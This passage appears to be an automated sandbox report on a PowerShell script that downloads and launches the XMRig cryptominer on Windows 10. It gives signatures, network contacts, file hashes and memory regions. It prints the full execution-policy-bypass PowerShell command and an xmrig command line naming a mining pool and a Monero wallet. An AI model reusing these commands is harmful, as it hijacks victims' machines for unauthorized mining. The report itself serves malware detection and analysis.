memory/3000-72-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-73-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-74-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-75-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-76-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-77-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-78-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-79-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-80-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-81-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-82-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-83-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-84-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-85-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-86-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-87-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-88-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-89-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-90-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-91-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-92-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-93-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-94-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-95-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-96-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-97-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-98-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-99-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-100-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-101-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-102-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-103-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-104-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-105-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-106-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-107-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-108-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-109-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-110-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-111-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-112-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-113-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-114-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-115-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-116-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-117-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
memory/3000-118-0x00007FF6C9160000-0x00007FF6C9D93000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 05:18
Platform
win10-20240404-en
Max time kernel
1796s
Max time network
1765s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3484 wrote to memory of 1640 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3484 wrote to memory of 1640 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.189.79.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
Files
memory/3484-3-0x00007FFC27E43000-0x00007FFC27E44000-memory.dmp
memory/3484-5-0x0000023B56790000-0x0000023B567B2000-memory.dmp
memory/3484-8-0x00007FFC27E40000-0x00007FFC2882C000-memory.dmp
memory/3484-9-0x0000023B56940000-0x0000023B569B6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_w45xar5h.3fh.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/3484-20-0x00007FFC27E40000-0x00007FFC2882C000-memory.dmp
memory/3484-25-0x00007FFC27E40000-0x00007FFC2882C000-memory.dmp
memory/3484-48-0x0000023B56AC0000-0x0000023B56AD2000-memory.dmp
memory/3484-61-0x0000023B56920000-0x0000023B5692A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/1640-90-0x0000023768050000-0x0000023768070000-memory.dmp
memory/1640-91-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/3484-93-0x00007FFC27E40000-0x00007FFC2882C000-memory.dmp
memory/1640-92-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/3484-94-0x00007FFC27E43000-0x00007FFC27E44000-memory.dmp
memory/3484-95-0x00007FFC27E40000-0x00007FFC2882C000-memory.dmp
memory/1640-96-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-97-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-98-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-99-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-100-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-101-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-102-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-103-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-104-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-105-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-106-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-107-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-108-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-109-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-110-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-111-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-112-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-113-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-114-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-115-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-116-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-117-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-118-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-119-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-120-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-121-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-122-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-123-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-124-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-125-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-126-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-127-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-128-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-129-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-130-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-131-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-132-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-133-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-134-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-135-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-136-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-137-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-138-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-139-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-140-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-141-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-142-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-143-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-144-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-145-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-146-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-147-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-148-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-149-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-150-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-151-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-152-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-153-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-154-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-155-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-156-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
Analysis: behavioral30
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 05:39
Platform
win10-20240404-en
Max time kernel
1798s
Max time network
1800s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2856 wrote to memory of 1380 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2856 wrote to memory of 1380 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
Files
memory/2856-2-0x00007FFF097B3000-0x00007FFF097B4000-memory.dmp
memory/2856-5-0x000001A21F600000-0x000001A21F622000-memory.dmp
memory/2856-8-0x00007FFF097B0000-0x00007FFF0A19C000-memory.dmp
memory/2856-9-0x000001A21F7B0000-0x000001A21F826000-memory.dmp
memory/2856-10-0x00007FFF097B0000-0x00007FFF0A19C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ib5505kl.zeq.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/2856-25-0x00007FFF097B0000-0x00007FFF0A19C000-memory.dmp
memory/2856-48-0x000001A21F5D0000-0x000001A21F5E2000-memory.dmp
memory/2856-61-0x000001A207100000-0x000001A20710A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/1380-90-0x000002E2FC8B0000-0x000002E2FC8D0000-memory.dmp
memory/1380-91-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/2856-92-0x00007FFF097B3000-0x00007FFF097B4000-memory.dmp
memory/1380-93-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/2856-94-0x00007FFF097B0000-0x00007FFF0A19C000-memory.dmp
memory/1380-95-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-96-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-97-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-98-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-99-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-100-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-101-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-102-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-103-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-104-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-105-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-106-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-107-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-108-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-109-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-110-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-111-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-112-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-113-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-114-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-115-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-116-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-117-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-118-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-119-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-120-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-121-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-122-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-123-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-124-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-125-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-126-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-127-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-128-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-129-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-130-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-131-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-132-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-133-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-134-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-135-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-136-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-137-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-138-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-139-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-140-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-141-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-142-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-143-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-144-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-145-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-146-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-147-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-148-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-149-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-150-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-151-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-152-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-153-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-154-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-155-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 05:17
Platform
win10v2004-20240426-en
Max time kernel
1788s
Max time network
1787s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5112 wrote to memory of 2640 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 5112 wrote to memory of 2640 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
